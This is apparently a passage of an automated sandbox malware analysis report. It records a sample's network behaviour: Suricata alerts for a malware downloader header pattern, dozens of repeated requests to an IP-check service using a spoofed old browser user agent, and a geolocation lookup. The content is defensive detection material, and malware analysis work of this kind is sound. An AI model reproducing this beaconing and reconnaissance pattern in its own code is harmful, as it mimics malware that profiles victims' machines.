                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49839 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49966 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49985 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50003 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50109 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50093 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50097 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50113 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50139 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50127 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50147 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50186 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50220 -> 132.226.247.73:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
